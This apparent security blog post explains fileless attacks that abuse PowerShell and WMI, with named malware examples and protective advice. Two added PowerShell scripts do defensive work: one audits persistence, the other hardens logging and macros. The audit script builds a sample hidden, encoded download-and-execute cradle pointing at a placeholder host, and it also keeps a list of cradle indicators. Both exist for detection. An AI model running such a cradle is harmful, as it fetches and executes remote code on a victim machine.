Non-Malware Attacks: What You Need to Know

Posted by Jeff Pelliccio on Sep 7, 2018 9:00:00 AM

In ICS insights, IT, client

Do you know what a non-malware attack is, or how it differs from a more traditional attack? Do you know why these attacks are so dangerous, or what you can do to prevent them? If not, don’t worry – you are not alone. Here you can find the answers to all of these questions and more.

Non-malware attacks are on the rise. A recent study by the Ponemon Institute found that 29 percent of the attacks organizations experienced in 2017 were fileless, and the same study projects that share to exceed 35 percent by the end of 2018.

Now, let's dive into non-malware attacks and how they are different from traditional attacks, as well as other, important information you need to know.

Non-Malware Attacks Explained

A non-malware attack, also referred to as a fileless attack, is a cyber attack in which the malicious code has no body on disk: nothing is written to the file system. Unlike an attack carried out by traditional malicious software, a non-malware attack does not require installing any software on the victim’s machine. Instead, attackers have found ways to turn Windows against itself, carrying out the attack with the administration tools that are already built into the operating system.

The idea behind this type of attack is simple – rather than dropping custom tools that could be flagged as malware, the attacker uses the tools already present on the device. A legitimate system process is taken over and the malicious code runs inside its memory space. You may also hear this approach referred to as “living off the land.”

The Process of a Non-Malware Attack

Usually, but not always, a non-malware attack will follow this chain of events:

  • A user visits a compromised website or opens a malicious email attachment

  • An exploit kit probes the machine for vulnerabilities and uses one to run malicious code through a built-in Windows administration tool, such as PowerShell or WMI

  • The fileless payload then executes entirely in memory, typically by loading itself into a legitimate Windows process, where it blends in with normal activity and leaves nothing on disk for a file scanner to find

What makes fileless malware hard to stop is that the delivery vector varies: it can arrive from a malicious email or website, be introduced by an application on the host that has already been compromised, or be planted through an exploit for an unpatched (zero-day) vulnerability.

The Danger of Non-Malware Attacks

The central challenge of a fileless attack is that it does not use a traditional malware file, so there is no file for signature-based anti-malware to hash and match. Detecting a fileless attack is therefore far harder than detecting a conventional infection.

To better understand why this type of attack is so dangerous, it’s a good idea to look at some of the most recent incidents of these attacks.

One of the earliest examples of fileless malware was the Terminate and Stay Resident (TSR) virus. These viruses did start from a file, but once the malicious code had been loaded into memory the executable was deleted, leaving only the memory-resident copy behind.

Malware delivered as PowerShell or JavaScript scripts, which runs inside a legitimate interpreter rather than as a dropped executable, is also considered fileless. Even the well-known Petya and WannaCry ransomware attacks used fileless techniques as part of their kill chains.

Another known example is the UIWIX ransomware. Like Petya and WannaCry, UIWIX spread using the EternalBlue exploit, but it writes no files to disk: EternalBlue installs the DoublePulsar backdoor, which lives in kernel memory, and DoublePulsar in turn loads the UIWIX payload directly into memory.

How Do the Non-Malware Attacks Actually Work?

Because non-malware attacks run through the default tools that ship with Windows, the malicious activity hides behind real, legitimate Windows processes. To the majority of anti-malware products, which judge files on disk rather than behaviour in memory, that activity is almost invisible.

The Primary Non-Malware Attack Targets

Staying undetected with custom tooling takes considerable effort and resources. This is why most fileless attacks focus on one of the following two built-in components:

  • PowerShell

  • WMI – Windows Management Instrumentation

Through these two components a fileless attack can run exploit code in memory or execute scripts that never touch the disk. Attackers choose them for two reasons. First, both are built into every modern version of Windows, so the same malicious code works on any target. Second, they are so central to administering Windows that turning them off outright would severely limit many legitimate tasks, and few organizations do so. Some experts nevertheless suggest that disabling PowerShell and WMI where they are not needed is an effective way to prevent fileless attacks; in practice, constraining them (removing the legacy PowerShell 2.0 engine, enabling script block logging, and limiting who may use WMI remotely) is more realistic than removing them.

4 Commonly Seen Types of Non-Malware Attacks

There are several variations and types of fileless attacks. Here, you can learn about the four that are most commonly seen.

  • Fileless persistence methods: the malicious code survives a system reboot without ever being stored as a file. For example, a malicious script may be kept in the Windows Registry and restarted from there after each reboot.

  • Memory-only threats: the payload runs entirely in memory, typically after exploiting a vulnerability in a Windows service. A reboot wipes the infection.

  • Dual-use tools: legitimate, pre-existing Windows system tools are turned to malicious purposes.

  • Non-PE (non-portable-executable) file attacks: a form of dual-use attack in which the payload is a script or document rather than an .exe, executed by legitimate Windows interpreters such as WScript, CScript and PowerShell.

Techniques Used by Non-Malware Attacks

To execute a non-malware attack, a hacker will use various techniques. Some of the ones that are most frequently used for these types of attacks include:

  • WMI persistence: the WMI repository can store malicious scripts that are invoked by WMI event subscriptions. A filter (a WQL query that fires on an event such as a timer interval or a user logon) is bound to a consumer that runs a command or script, so the payload re-executes without any file on disk.

  • Script-based techniques: attackers embed encoded shellcode or binaries inside a script. The script decodes them on the fly and executes them through .NET objects, so no separate file is ever written to disk.

  • Memory exploits: the malware is executed remotely by exploiting a memory-corruption vulnerability on the victim’s machine.

  • Reflective DLL injection: a malicious DLL is manually loaded into a process’s memory without ever being saved to disk. The DLL can be embedded in malicious scripts or macros, or hosted on a remote machine and delivered over a staged network channel.
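Added here as an example (not code from the original post, nor a vendor tool), the following PowerShell script audits the two persistence locations described above, the WMI repository and the registry Run keys, and decodes the `-EncodedCommand` form of the script-based technique. It assumes Windows PowerShell 5.1 with the CimCmdlets module (present on Windows 8/Server 2012 and later), runs read-only, and its indicator strings and sample command line are this example's own constructions, not observed attack data.

```powershell
# Added example, not code from the original post: a read-only audit of the
# two places fileless persistence most often hides (permanent WMI event
# subscriptions and the registry Run keys), with a decoder for PowerShell
# -EncodedCommand payloads. Run from an elevated PowerShell 5.1 prompt; it
# changes nothing. The indicator list is this example's own assumption.

$Indicators = @(
    'Invoke-Expression', 'IEX', 'DownloadString', 'DownloadFile',
    'FromBase64String', 'Reflection.Assembly', 'Net.WebClient',
    'WScript', 'CScript', '-nop', '-w hidden', '-WindowStyle Hidden'
)

function ConvertFrom-EncodedCommand {
    # Extracts a -e/-enc/-EncodedCommand argument and returns the UTF-16LE
    # text PowerShell would actually run, or $null if there is none.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-Suspicious {
    # Checks a command line, and its decoded form if any, against the indicators.
    param([string]$CommandLine)
    $decoded = ConvertFrom-EncodedCommand $CommandLine
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $hits = @($Indicators | Where-Object { $text -match [regex]::Escape($_) })
    [pscustomobject]@{ CommandLine = $CommandLine; Decoded = $decoded; Indicators = $hits }
}

# Constructed sample (not an observed attack): a download cradle hidden
# behind -EncodedCommand, built at runtime so the base64 is valid.
$cradle = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2")'
$sample = 'powershell.exe -nop -w hidden -enc ' +
          [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
Test-Suspicious $sample | Format-List

"== Permanent WMI event subscriptions (root/subscription) =="
$ns        = 'root/subscription'
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
foreach ($b in @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)) {
    # Binding.Filter and Binding.Consumer are CIM references; Name is the join key.
    $f = $filters   | Where-Object Name -eq $b.Filter.Name
    $c = $consumers | Where-Object Name -eq $b.Consumer.Name
    # CommandLineEventConsumer carries a command, ActiveScriptEventConsumer a script body.
    $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate }
               elseif ($c.ScriptText) { $c.ScriptText } else { '' }
    [pscustomobject]@{
        Filter   = $f.Name
        Query    = $f.Query
        Consumer = "$($c.CimClass.CimClassName) $($c.Name)"
        Payload  = $payload
        Flags    = (Test-Suspicious $payload).Indicators -join ', '
    }
}

"== Registry Run / RunOnce autostarts =="
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in ($props.PSObject.Properties | Where-Object Name -notlike 'PS*')) {
        $r = Test-Suspicious ([string]$p.Value)
        [pscustomobject]@{ Key = $key; Name = $p.Name; Value = $p.Value
                           Decoded = $r.Decoded; Flags = ($r.Indicators -join ', ') }
    }
}
```

The sample line is flagged twice over: the launcher switches are visible in the raw command line, and the cradle only appears once the base64 is decoded, which is why the decode step matters. A stock Windows install has exactly one legitimate binding in root/subscription, the "SCM Event Log Filter" bound to the "SCM Event Log Consumer" (an NTEventLogEventConsumer); anything else, and in particular any CommandLineEventConsumer or ActiveScriptEventConsumer, deserves a close look. The indicator list is deliberately short; treat it as a starting point for your own environment, not as a complete signature set.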

Now, it is time to learn how to protect against non-malware attacks.

5 Effective Ways to Protect Yourself Against Non-Malware Attacks

Experts recommend several measures that prevent, or at least blunt, fileless malware, from restricting the Windows tools it most often abuses to deploying endpoint security that watches behaviour rather than files. The following five tips can also help protect your company.

  • Restrict any management framework you do not need: remove the legacy PowerShell 2.0 engine, limit PowerShell and WMI use to the administrators and hosts that require them, and log what remains

  • Disable macros, or at least block macros in Office documents that came from the Internet

  • Use endpoint security that inspects process behaviour and memory, not only files on disk

  • Monitor network traffic for unexpected outbound connections; a fileless payload still has to fetch its next stage or reach its operator

  • Make sure all your devices are updated regularly, since an in-memory exploit relies on an unpatched vulnerability to get in
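The following PowerShell script, added here as an example and not part of the original post, applies the first two tips above through their registry-backed Group Policy keys and turns on the PowerShell logging that makes the remaining tools observable. It assumes Windows PowerShell 5.1 on Windows 10 or later and Office 2016 or later (policy hive version "16.0"); the transcript folder is this example's own choice.

```powershell
# Added example, not code from the original post: applies three of the
# controls recommended above through their registry-backed policy keys.
# Run from an elevated PowerShell 5.1 prompt on a lab machine first; in
# production push the same values with Group Policy or Intune. Paths are the
# documented policy keys for Windows PowerShell 5.x and for Office 2016 and
# later (hive version "16.0"); the transcript folder is this example's choice.

function Set-PolicyValue {
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 1. Restrict the management framework: remove the PowerShell 2.0 engine.
#    An attacker who can run "powershell -Version 2" lands in an engine that
#    predates the logging enabled below, so leaving it installed undoes step 2.
#    (Windows 10/11 feature name; on Windows Server use Remove-WindowsFeature PowerShell-V2.)
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null

# 2. Make what remains observable. Script block logging writes the
#    de-obfuscated code to event 4104 even when it arrived as -EncodedCommand
#    or was unpacked in memory; module logging records the cmdlets invoked;
#    transcription keeps a full text record of every session.
$ps = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
Set-PolicyValue "$ps\ScriptBlockLogging"        'EnableScriptBlockLogging' 1
Set-PolicyValue "$ps\ModuleLogging"             'EnableModuleLogging'      1
Set-PolicyValue "$ps\ModuleLogging\ModuleNames" '*' '*' 'String'
Set-PolicyValue "$ps\Transcription"             'EnableTranscripting'      1
Set-PolicyValue "$ps\Transcription"             'OutputDirectory' 'C:\PSTranscripts' 'String'

# 3. Disable macros for the current user's Office apps: VBAWarnings = 4 is
#    "disable all without notification", and blockcontentexecutionfrominternet
#    stops macros in files marked as downloaded from the Internet even if a
#    user later changes the first setting.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    Set-PolicyValue $sec 'VBAWarnings' 4
    Set-PolicyValue $sec 'blockcontentexecutionfrominternet' 1
}

# Verify the PowerShell logging values that were written.
Get-ItemProperty -Path "$ps\ScriptBlockLogging", "$ps\Transcription" |
    Format-List EnableScriptBlockLogging, EnableTranscripting, OutputDirectory
```

Two caveats a practitioner should keep in mind. The Office keys live under HKCU, so they only cover the user who runs the script; to cover everyone, deliver the same values through a user Group Policy. And logging is not lockdown: putting PowerShell into Constrained Language Mode, which stops scripts from calling arbitrary .NET types such as the reflective loaders described above, requires an application-control policy (AppLocker or Windows Defender Application Control) rather than a registry value. Point the transcript directory at a write-only network share where you can, so an attacker who gains local control cannot tidy up after themselves.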

Make Sure You're Prepared 

The fact is, fileless attacks are on the rise, mainly because they are so difficult to detect with standard anti-malware solutions. Even though detecting non-malware threats remains challenging, the measures in this guide can greatly reduce the likelihood that one succeeds against your organization.

To stay ahead of this threat, make sure you hire professionals who keep up to date with the latest techniques. They are your first line of defense when it comes to protecting your company and its information. Don't be caught without the proper resources: you stand to lose more than data; you could also lose the trust of your customers. Contact ICS now to find the people you need to identify where your weaknesses are and how to fix them.
